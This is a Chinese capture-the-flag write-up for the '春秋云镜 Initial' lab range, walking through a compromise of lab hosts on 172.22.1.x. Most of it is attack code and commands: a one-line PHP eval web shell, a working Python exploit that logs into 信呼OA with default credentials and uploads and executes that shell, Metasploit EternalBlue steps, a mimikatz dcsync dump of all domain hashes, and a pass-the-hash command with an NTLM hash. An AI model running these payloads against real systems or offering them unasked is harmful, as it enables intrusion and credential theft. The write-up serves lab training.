春秋云镜-Initial
前言
其实这个才是真正的入门?纯脚本小子,nday 你就打吧
flag01
直接 thinkphp 工具一把梭,getshell ,上蚁剑,但只是 www-data 权限
sudo -l 一下,发现可以 mysql 提权读 root 目录下的 flag
flag02
在前面那个基础去上代理和 fscan ,又扫出个信呼oa nday,直接打,好无聊()
shell.php
<?php eval($_GET["1"]);?>poc.py
import requests
session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=::',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('shell.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('whoami');")
print(url_pre + filepath + "?1=system('whoami');")
print(r.text)
flag03
直接扫到了永恒之蓝,msf 开打,中间代理不太稳定可能会有点问题得多等一下
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit
拿集成的 kiwi 收集 hash
load kiwi
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
用 crackmapexec 打 PTH
proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
作为第一次接触域来说应该很简单好玩,里面的具体知识一边学一边写,不专门放在靶场记录里了